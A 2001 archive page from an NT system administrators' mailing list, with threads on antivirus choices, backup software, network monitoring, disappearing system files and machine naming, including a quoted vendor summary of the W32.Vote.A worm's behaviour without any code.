RE: InoculateIT opinions

2001-09-28 Thread RZorz
Title: RE: InoculateIT opinions





I could swear Roger of Peregrine did an analysis of what was out there. Care to share? Sophos, for example, doesn't get much ink either. 

-Original Message-
From: Steve Frenzl [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 11:51 AM
To: NT System Admin Issues
Subject: InoculateIT opinions




My company is looking for a workgroup AV and I was curious what the
opinions were of Inoculate. From past threads, the consensus seems to be
that Norton is better than Mcafee but I don't remember seeing Inoculate
discussed. Any input is appreciated.


Steve Frenzl
Systems Administrator
Farmer Automotive Group



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Network Traffic

2001-09-28 Thread RZorz
Title: RE: Network Traffic





Our host, Sunbelt, has Netboy. suck up points?


-Original Message-
From: Carlos Garcia-Moran [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 1:57 PM
To: NT System Admin Issues
Subject: RE: Network Traffic



Well, My boss doesn't mind spending the cash (unless we talking about
20K or more, then It's paperwork HELL!) as long as I can prove the tool
has some worth. He is big into monitoring :)


-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]] 
Sent: Friday, September 28, 2001 4:52 PM
To: NT System Admin Issues
Subject: RE: Network Traffic



If you're willing to spend the $$$ take a look at Packeteer PacketShaper


-Original Message-
From: Carlos Garcia-Moran [mailto:[EMAIL PROTECTED]] 
Sent: Friday, September 28, 2001 1:50 PM
To: NT System Admin Issues
Subject: Network Traffic



Heyas!


Can anyone suggest a good tool for network traffic monitoring? We have
all HP Procurve Switches and use TopTools, but it doesn't seem that good
(unless im just missing some config options). For example we wanted to
track down a user that was pegging our T @ 97% utilization (he had 15
family guy downloads on morpheus at the same time) and TT did not tell
us much. We finally tracked him down by using firewall logs...kind of
time consuming


Any good ideas


Cheers


Carlos Garcia-Moran
Senior Network Engineer
Athenahealth, INC
781.392.0157 Main
617.543.1701 Cell
[EMAIL PROTECTED]



Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/



Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Backup - recommendation please?

2001-09-28 Thread RZorz
Title: RE: Backup - recommendation please?





Unless I got my demos crossed, I thought it could handle open files. You should be able to retrieve a deleted e-mail immediately if I'm not mistaken (I know, bad example)

-Original Message-
From: Greg Page [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 2:18 PM
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?



Doesn't Live Vault backup the file only after it is closed? It appears as if
some files never get closed. But Live Vault is a solid choice.


Greg



-Original Message-
From: Dempster, Mark [mailto:[EMAIL PROTECTED]] 
Sent: Friday, September 28, 2001 12:30 PM
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?



Thanks, Mark (and everyone else that replied). I'll look into that.


Mark


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 02:47
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?



Yes, LiveVault is what you are looking for. Real time backup.
http://vs46311.server-store.com/store/page.inetstore?id=3
http://vs46311.server-store.com/store/page.inetstore?id=3 


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: September 28, 2001 9:04 AM
To: NT System Admin Issues
Subject: RE: Backup - recommendation please?




Seems to me something like livevault (I think that was it) would work. 


-Original Message- 
From: Dempster, Mark [ mailto:[EMAIL PROTECTED]
mailto:[EMAIL PROTECTED] ] 
Sent: Friday, September 28, 2001 2:03 AM 
To: NT System Admin Issues 
Subject: Backup - recommendation please? 



Hi, 


I'm looking for a backup solution for a new customer. We normally use 
unenhanced versions of Backup Exec or Arcserve,  back the system up out of 
hours. Unfortunately this customer needs to work 24/7. 


The software my company produces uses a well-known accounting package at its


core, which stores its data in a very large number of files which are 
related to each other. It isn't possible to use a normal 'backup open 
files' approach since if two related files are backed up - but new data has 
been added in-between - restoring them will leave the system in an 
inconsistent state. 


So, I think what's needed (if such a thing exists) is a product that will 
take a snapshot of an entire directory (inc. subdirs) and back that up - 
while leaving the system usable (a moderate slowdown is acceptable). Does 
anyone know if there's an add-on for our normal backup tools (or even a 
completely different product) that can do what I'm asking? If so, what's 
your experience of it? 


Thanks, 


Mark 


Mark Dempster 
Technical Consultant 
Infor:Swan Business Solutions 
Me transmitte sursum, Caledoni! 



_ 
This message has been checked for all known viruses by Star Internet 
delivered through the MessageLabs Virus Scanning Service. For further 
information visit http://www.star.net.uk/stats.asp
http://www.star.net.uk/stats.asp or alternatively call 
Star Internet for details on the Virus Scanning Service. 


Want to unsub? Do that here: 
http://www.w2knews.com/rd/rd.cfm?id=unsub
http://www.w2knews.com/rd/rd.cfm?id=unsub 
Need a good FAQ? Try this one first: 
http://www.ultratech-llc.com/KB/ http://www.ultratech-llc.com/KB/ 


Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/




Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/



_
This message has been checked for all known viruses by Star Internet
delivered through the MessageLabs Virus Scanning Service. For further
information visit http://www.star.net.uk/stats.asp or alternatively call
Star Internet for details on the Virus Scanning Service.


_
This message has been checked for all known viruses by Star Internet
delivered through the MessageLabs Virus Scanning Service. For further
information visit http://www.star.net.uk/stats.asp or alternatively call
Star Internet for details on the Virus Scanning Service.


Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: InoculateIT opinions

2001-09-28 Thread RZorz
Title: RE: InoculateIT opinions





As a Panda user, I can only ask 'why?'


-Original Message-
From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 2:46 PM
To: NT System Admin Issues
Subject: RE: InoculateIT opinions



And yet Boeing chose Panda for their huge deployment.



-Original Message-
From: David Hekimian [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 2:46 PM
To: NT System Admin Issues
Subject: Re: InoculateIT opinions



Steve,


Seriously take a look at TrendMicro's virus scan offering - OfficeScan
Corporate Edition. I've used Symantec's Norton Antivirus, CA's InoculateIT,
McAfee's VirusScan and countless others..


TrendMicro does workgroup AV right! From a centralized managemnet console
(web based) to deploy to new users, set policies on the local client (Set
whether the user can disable OfficeScan or not, etc.), and automatic
updates of virus definitions and deployment to desktops.


Also, Look at TrendMicro's NeatSuite. It a combination of OfficeScan,
ScanMail and InterScan Viruswall for about the same price as just 1 of the
products.



- David


- Original Message -
From: Steve Frenzl [EMAIL PROTECTED]
To: NT System Admin Issues [EMAIL PROTECTED]
Sent: Friday, September 28, 2001 11:50 AM
Subject: InoculateIT opinions




 My company is looking for a workgroup AV and I was curious what the
 opinions were of Inoculate. From past threads, the consensus seems to be
 that Norton is better than Mcafee but I don't remember seeing Inoculate
 discussed. Any input is appreciated.

 Steve Frenzl
 Systems Administrator
 Farmer Automotive Group



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Files keep disappearing from the winnt dir

2001-09-28 Thread RZorz
Title: Message



Find 
an undelete program and see if they show up. 

  -Original Message-From: Greg Page 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 4:33 
  PMTo: NT System Admin IssuesSubject: RE: Files keep 
  disappearing from the winnt dir
  Gremlins are doing it. 
  
  We 
  used to occasionally lose WINS entries every once in awhile and no one could 
  connect to the server. That was with NT 4.0. With 2000,I haven't had any 
  issues like that.
  
  
  Greg
  

-Original Message-From: John Cesta - 
Lists [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 
2001 3:10 PMTo: NT System Admin IssuesSubject: RE: 
Files keep disappearing from the winnt dir
Nothing in the event logs. I thinik I will turn on auditing. Today 
the files were gone in a matter or 1 hour after I copied them in the 
directory.

John

  -Original Message-From: Ian Kelly 
  [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 
  2:59 PMTo: NT System Admin IssuesSubject: RE: Files 
  keep disappearing from the winnt dir
  
  Anything in the 
  event logs? Is auditing turned on?
  
  
  Ian-[EMAIL PROTECTED]-To 
  assume makes an ass out of YOU. Leave ME out of this. 
  
  -Original 
  Message-From: John 
  Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: September 28, 2001 13:40 
  PMTo: NT System Admin 
  IssuesSubject: RE: Files 
  keep disappearing from the winnt dir
  
  
  
  
  
  
  I 
  just ran an AV on the server. No virus.
  
  
  
  John
  
-Original 
Message-From: John 
Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 
1:12 PMTo: NT System 
Admin IssuesSubject: 
RE: Files keep disappearing from the winnt 
dir



AT 
service isn't running. No hands ever touch that server, it's in a locked 
cabinet only accessible by me, my access code, palm print and 
badge..



John

  -Original 
  Message-From: 
  Brian Steele [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 
  2001 12:44 PMTo: NT 
  System Admin IssuesSubject: Re: Files keep 
  disappearing from the winnt dir
  
  WAG: Is 
  the Task Scheduler running? Check to see if anyone's set 
  anything nasty to run.
  
  
  
  Brian
  
  
  

- 
Original Message - 

From: 
John 
Cesta - Lists 

To: 
NT System Admin 
Issues 

Sent: 
Friday, September 28, 2001 11:07 
AM

Subject: 
Files keep disappearing from the winnt 
dir





I am having 
a sort of weird problem on one of my NT4.0 SP6a servers. A while 
back I had to clean the server - chkdsk - seemed to work 
ok.



After that 
this problem keeps occurring. One day I noticed that the files - 
notany directories just files - in the c:\winnt 
directory were gone except for two of them. I copied the files from 
another identical NT box in to this server's winnt directory. A day 
or so later they were gone again. I copied them into the dir again, 
a day later they are gone. I KNOW that the server does not have any 
viruses. I can only figure that the server may have a corrupt file 
system and needs to be cleaned once more. 




Any 
suggestions?



John 
Cesta
  Want to 
  unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? 
  Try this one 
  first:http://www.ultratech-llc.com/KB/
Want to 
unsub? Do that 
here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? 
Try this one 
first:http://www.ultratech-llc.com/KB/
  Want to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
  first:http://www.ultratech-llc.com/KB/Want 
  to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one first:http://www.ultratech-llc.com/KB/Want to 
unsub? Do that 

RE: Exchange/Outlook Alternatives

2001-09-28 Thread RZorz
Title: RE: Exchange/Outlook Alternatives





Aren't there a couple ASP-type companies out there providing this kind of service? I think some are even using Exchange. 

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 5:08 PM
To: NT System Admin Issues
Subject: RE: Exchange/Outlook Alternatives



Mark -


We're in the same boat. Regardless of how many times I ask the same
question, I get the same answer - nothing compares to Exchange. As servers
are cheap in the overall scheme of things - if the company can not afford to
do Exchange, I still rely on ISP mail. In between the ISP and the office, I
use a software product called Software 602 which handles the pull portion.
In addition, I looked at the email from Deerfield but am REALLY pissed at
them and will not resell or purchase any of their products anymore.


Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
Who's watching your network?
www.clarksupport.com
 301-610-9584 voice
 240-465-0323 Efax


-Original Message-
From: Mark [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 7:56 PM
To: NT System Admin Issues
Subject: Exchange/Outlook Alternatives


I'm constantly asked for recommendations on VIABLE alternatives to the
MS Outlook/Exchange groupware system. Let's face it: Exchange is
expensive, and does a lot of things that most of my SMB customers will
never need. I've seen a few different products, but have yet to find one
that integrates and works as well as Outlook with an Exchange server.


Do you guys have any ideas on substitutes. The main core features that
most SMB's use would be the scheduling/calendaring , POP/IMAP email, and
address book. It'd be nice to have the whole lot integrated, but
seperate products with a good UI would do. The email and address book
clients are easy enough to find, but what about calendaring? Something
with the ability to both share an office calendar, and have seperate
(but viewable) calendars for each worker. Editor priveleges for a
secretary on specific calendars would be a plus, as well. To complicate
it a bit further, how about something that would work on a peer-to-peer
network ( 10 PC's) with no dedicated server? Any thoughts?


Y�Z鏶zm
6岒wᮚ'{lמu(@A:牤w-i⁦0⁵m歫^req楨


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: List or BBS

2001-09-28 Thread RZorz



I 
don't get it. If you don't like the e-mail, then say NO MAIL and read/respond 
tothe postings thru the website. Or get the digest. 


  -Original Message-From: Chris Shattock 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:06 
  AMTo: NT System Admin IssuesSubject: List or 
  BBS
  These lists are a PITA - but not worth giving up. 
  Have you (Sunbelt) or this forums' correspondents considered using a Bulletin 
  Board System - such as that by Infopop - Ultimate BBS.
  
  A couple of years agoin the (Y)UK The 
  Professional Contractors Group (anti-IR35) set their 'forums' up this way - 
  and it ran far better than a list - I believe it's still going - but a lot of 
  others use Ultimate BBS - check from http://www.infopop.com/
  
  I am not a reseller etc. - but it is a real pain 
  dealing with a list when all you can get a 64K ISDN BRI in some 'third-world' 
  country with a crap telecomm. system and you need that link for remote 
  sysadmin/support/development. A BBS would enable me to use my connection more 
  efficiently - and may ease your (Sunbelt) admin. issues.
  
  Chris ShattockWant to unsub? Do that 
  here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
  this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Intermittent Network logon problem

2001-09-28 Thread RZorz
Title: RE: Intermittent Network logon problem





Never used setprfdc. Does it tell you that it connected to the DC that you think it should connect to? 


Somebody posted a way to see what DC your authenticated against. 


-Original Message-
From: Troy Rambo /278 Systems Specialist [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 28, 2001 6:26 AM
To: NT System Admin Issues
Subject: Intermittent Network logon problem



One of our BDC's (our DNS server) on our NT4 network went down two weeks ago
and was unrecoverable, so we had to rebuild it from scratch. Ever since
then we have had an erratic logon problems throughout our network. Yes we
are running DHCP. It's all one subnet and each different building has it's
own BDC that the users are pointed to using setprfdc to use as their
preferred domain controller.


When logging on, my users will occasionally not get their logon script to
run even though they are logged into the network. Upon reboot and relogging
in, it then it maps fine. It's never on the same machine twice, and it's in
every corner of our network across three linked building across two city
blocks.


Sometimes it takes turning the machine off for a couple of minutes before
rebooting in order for it to connect to the BDC to run their script.


I'm running out of ideas here. Does anyone have any ideas how I can
troubleshoot this? I'm going nuts running all over the place, trying to
figure this one out.


Your ideas are greatly appreciated.


Thanks


Troy


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Workstation Naming Standards

2001-09-28 Thread RZorz
Title: RE: Workstation Naming Standards



Our 
servers were named after Little Rascal characters, because before-my-time they 
had a contest.At least it's easier to explain that Darla does this 
and Spanky does that. I worked for anintegrator that came up with 
these really cryptic server names based on location/function, and frankly I've 
yet to see an advantage.It only helped OUR people if we came back, which 
of course we rarely did.

The 
important thing is you can find the machine for both troubleshooting and 
inventory. 

  -Original Message-From: Miley, Dan 
  [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 7:11 
  AMTo: NT System Admin IssuesSubject: RE: Workstation 
  Naming Standards
  3 
  digit city, 1 digit OS, then machine inventory/asset tag# (this ties it back 
  to the inventory and username.)
  
  looks like we may be doing something similar with servers 
  soon.
  
  I 
  don't like the way 2000 automatically names machines 
  domainname-randomalphanumeric. totally useless for 
  finding machines.
  
  I 
  did work at one site where they named their servers after star trek 
  characters. it sounded funny when they said "Spock crashed again", 
  " Can you reboot Spock".
  
  Dan
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 
2001 2:06 PMTo: NT System Admin IssuesSubject: RE: 
Workstation Naming Standards
I use the user name, but I've got a small 50 person 
installation. I change the name if the person changes. It simplifies 
figuring out who's having a problem, because I know everyone. Tougher in a 
large organization. 
I sure as heck wouldn't agonize over it. You want to be able 
to browse a list to pinpoint who's having a problem. And if necessary tie 
that back to some inventory/allocation information. Serial Number 
would probably work if you have a good inventory system. 

-Original Message- From: 
David James [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 27, 2001 10:11 AM 
To: NT System Admin Issues Subject: 
RE: Workstation Naming Standards 
I don't use user names. What happens when that 
employee quits? You have to rename their machine as 
part of setting up a new user? I would use 
City_Dept_JobFunction then add a number for multiple job functions. DJ 
-Original Message- From: 
Osama S. [mailto:[EMAIL PROTECTED]] 
Sent: Thursday, September 27, 2001 12:05 PM 
To: NT System Admin Issues Subject: 
Workstation Naming Standards 
hi, 
we will be deploying Win2K from scratch on the user's 
machines (around 700) replacing NT 4. SO I was 
reviewing our machine naming convention. 
Our Offices are located in two cities, one single 
domain. So far we would use something like 
"CityName-Department-User Real Name" (where city 
name and department are abbrevations) to name workstations. 
Usually the NT Names are the users Company ID, which is 
unique. 
I was wondering how you guys/girls are naming your 
workstations and users. 
regards 
Uso 
Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub 
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ 

Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub 
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ 
Want to unsub? Do that 
here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try 
this one first:http://www.ultratech-llc.com/KB/Want to 
  unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a 
  good FAQ? Try this one first:http://www.ultratech-llc.com/KB/
  This e-mail may be privileged and/or confidential, 
  and the sender does not waive any related rights and obligations. Any 
  distribution, use or copying of this e-mail or the information it contains by 
  other than an intended recipient is unauthorized. If you received this e-mail 
  in error, please advise me (by return e-mail or otherwise) immediately. 
  
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Another F(*^ virus!

2001-09-27 Thread RZorz
Title: Another F(*&^ virus!



thanks. Still don't see a virus-specific newsletter with alerts like 
other vendors seem to have. And they were way, way behind in getting the 
Nimda and Vote defs out the door. 

  -Original Message-From: Lagerstrom, Lanette 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 
  4:44 PMTo: NT System Admin IssuesSubject: RE: Another 
  F(*^ virus!
  
  Just FYI --
  * VIRUS CENTER
  Panda Software and the Windows 2000 Magazine Network have 
  teamed to 
  bring you the Center for Virus Control. Visit the site often 
  to remain 
  informed about the latest threats to your system 
  security.
  http://www.secadministrator.com/panda
  Lanette 
  Lagerstrom
  Northrop 
  Grumman
  Information 
  Technology
  Internal Information 
  Services
  Network 
  Administrator
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 
2001 6:51 AMTo: NT System Admin IssuesSubject: RE: 
Another F(*^ virus!
Actually one of my users sent that to me. I use Panda, which of 
course once again seems to be the last to know.

  -Original Message-From: Danny Iaconetti 
  [mailto:[EMAIL PROTECTED]]Sent: Monday, 
  September 24, 2001 4:03 PMTo: NT System Admin 
  IssuesSubject: RE: Another F(*^ 
virus!
  According to SARC, updating your definitions will detect this worm. 
  Although, the latest update I get is dated Sep. 20. What's the 
  scoop?
  
-Original Message-From: 
[EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED]]Sent: Monday, September 
24, 2001 4:37 PMTo: NT System Admin IssuesSubject: 
Another F(*^ virus!
Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! 
Name of attachment: WTC.exe Size of attachment: 55808 Bytes 
Symantec Security Response http://securityresponse.symantec.com 
 W32.Vote.A@mm Discovered on: September 
24, 2001 Last Updated on: September 24, 2001 at 
09:56:27 AM PDT 
W32.Vote.A@mm is a mass-mailing worm that is written in 
Visual Basic. When executed, it will email itself out to all email 
addresses in the Microsoft Outlook address book. The worm will insert 
two .vbs files on the system, and it will also attempt to delete files 
from several antivirus products. 
Type: Worm 
Infection Length: 55,808 Bytes 
Virus Definitions: September 24, 2001 
Threat Assessment: 
 Wild: 
Low Damage: High Distribution: High 
 
Wild: 
Number of infections: 0 - 49 Number of sites: 3 - 9 Geographical 
distribution: Medium Threat containment: 
Moderate Removal: Moderate Damage: 
Payload: Large scale e-mailing: 
Emails everyone in the Microsoft Outlook addressbook Deletes files: After reboot, the worm attempts to delete all 
files in the Windows folder Modifies files: All 
files with the extension "htm" or "html" will be overwritten. 
Compromises security settings: If the 
Backdoor.Trojan was successfully downloaded and installed, anyone could 
gain full access to the computer. 
Distribution: 
Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! 
Name of attachment: WTC.exe Size of attachment: 55808 Bytes 
Technical description: 
W32.Vote.A@mm is a mass-mailing worm written in the 
Visual Basic language. It requires the file Msvbvm50.dll to 
execute.
When executed, the worm will attempt to email itself to 
all contacts in the Microsoft Outlook address book. The email will 
appear as follows.
Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM! 

Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace! 
Attachment: WTC.EXE 
Next, the worm will insert two .vbs files on the 
system: 
\Windows folder\ZaCker.vbs \Windows\System folder\MixDaLaL.vbs 
In addition, the worm will attempt to download and 
execute a file. This file is detected as Backdoor.Trojan by Norton 
Antivirus.
Finally, the worm will attempt to delete all files from 
several folders. These folders appear to be the default installation 
folders for several antivirus products. For Norton AntiVirus, this worm 
will only attempt to delete the files if Norton Antivirus is located in 
C:\Program Files\Norton AntiVirus.
What the dropped files do 
MixDaLaL.vbs MixDaLaL.vbs is a 
Visual Basic Script file that is inserted in the \Windows\System folder. 
This file is executed by the worm. As the file is executed, it will look 
through all folders on all fixed drives and network drives for files 
with the extensions .htm or .html. If such a files are found, they are 
  

RE: Testing 1, 2, 3 - Ignore

2001-09-27 Thread RZorz
Title: RE: Testing 1, 2, 3 - Ignore





Exactly my goal in life. Make more money and hire you guys to make it work grin


-Original Message-
From: Dave Gushi [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:56 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore



This is very funny stuff. It seams the more money some managers make the
less they know. I have a VP that thinks the closer he is to the server the
better data response he's going to get. 


Dave Gushi



God Bless America!





-Original Message-
From: Bill Higgins [mailto:[EMAIL PROTECTED]] 
Sent: Wednesday, September 26, 2001 7:50 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore


almost as bad as a mangaler (manager) that I had that constantly told people
that we had an AtherNet (can you say ethernet) network running Novel
(as in book) Server.


I didn't have the heart to tell him that we were actually broken ring...



Two more sleeps til Vegas (1)


(1) Hi William


-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 17:45
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore



Did you hear the wind?


I had a tech manager years ago that referred to all networks as LAND's and
portables as Labtops. Thought the joke would transfer.


Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
Who's watching your network?
www.clarksupport.com
 301-610-9584 voice
 240-465-0323 Efax


-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:43 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore


No, but he may be trying to setup that LAN


-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 5:41 PM
To: NT System Admin Issues
Subject: RE: Testing 1, 2, 3 - Ignore



Uh huh, trying to set up that LAND aren't you?


Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
Who's watching your network?
www.clarksupport.com
 301-610-9584 voice
 240-465-0323 Efax


-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 26, 2001 8:38 PM
To: NT System Admin Issues
Subject: Testing 1, 2, 3 - Ignore



Regards,


Sean Martin, MCSE
Network Administrator
Ribelin Lowell  Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED]
mailto:[EMAIL PROTECTED]
DO NOT read, copy or disseminate this communication unless you are the
intended addressee. This e-mail communication contains confidential
and/or privileged information intended only for the addressee. If you
have received this communication in error, please call us immediately at
(907) 561-1250 and ask to speak to the sender of the communication.
Also, please e-mail the sender and notify the sender immediately that
you have received the communication in error.


Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/


Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: ArcServeIT vs. Backup Exec

2001-09-27 Thread RZorz
Title: RE: ArcServeIT vs. Backup Exec





Don't forget to check out UltraBac too. 


-Original Message-
From: Stephen Moreau [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 27, 2001 12:02 PM
To: NT System Admin Issues
Subject: Re: ArcServeIT vs. Backup Exec



Dan,


I have no experience with Veritas but I'm thinking of switching to it.


I've been using Arcservit for some time and I have to agree that their
support really *stinks*. I'm currently using Arcserveit 2000 and was
having a ton of trouble with it. I finally spent 2 hours on the phone
being bumped around until someone with a *little* knowledge showed up.


Basically, if you install Arcservit 2000 make darn sure you install the
latest and greatest patches starting with SP2.


Some of my experiences were:


1. Full backups not happening and the temp directory becoming full.
2. Could not read the status or details of a tape without first using the
inventory feature.
3. Very slow to back up Snap Servers.
4. Database getting corrupt.


Since I applied SP2 and all the latest patches everything seems to be fine
with the exception of one continuous problem:


If I make a modification to a backup schedule then SAVE it then use the
little -x- in the top right corner to close it the program freezes and I
have to use task manager to kill it. I refuse to call their tech
supportless group anymore.




Good luck!


Stephen


Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/



Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Monitoring email

2001-09-26 Thread RZorz



There's tools like ISSCAN that will help find e-mails, but there's no 
content filtering in Exchange. 

  -Original Message-From: Neil Harvey 
  [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 
  7:13 AMTo: NT System Admin IssuesSubject: Monitoring 
  email
  Does anyone know if exchange 5.5 sp4 has the 
  ability to scan and monitor emails for certain content. If I can help it 
  I don't want to have to buy a third party product.
  
  Neil HarveyMCP, MCP+I, MCSE, CNAIT 
  Manageremw lawDDI: +44 (0)1604 666425Want to unsub? 
  Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? 
  Try this one 
first:http://www.ultratech-llc.com/KB/
Want to unsub? Do that here:
http://www.w2knews.com/rd/rd.cfm?id=unsub
Need a good FAQ? Try this one first:
http://www.ultratech-llc.com/KB/





RE: Win2k Cluster and Mac Shares

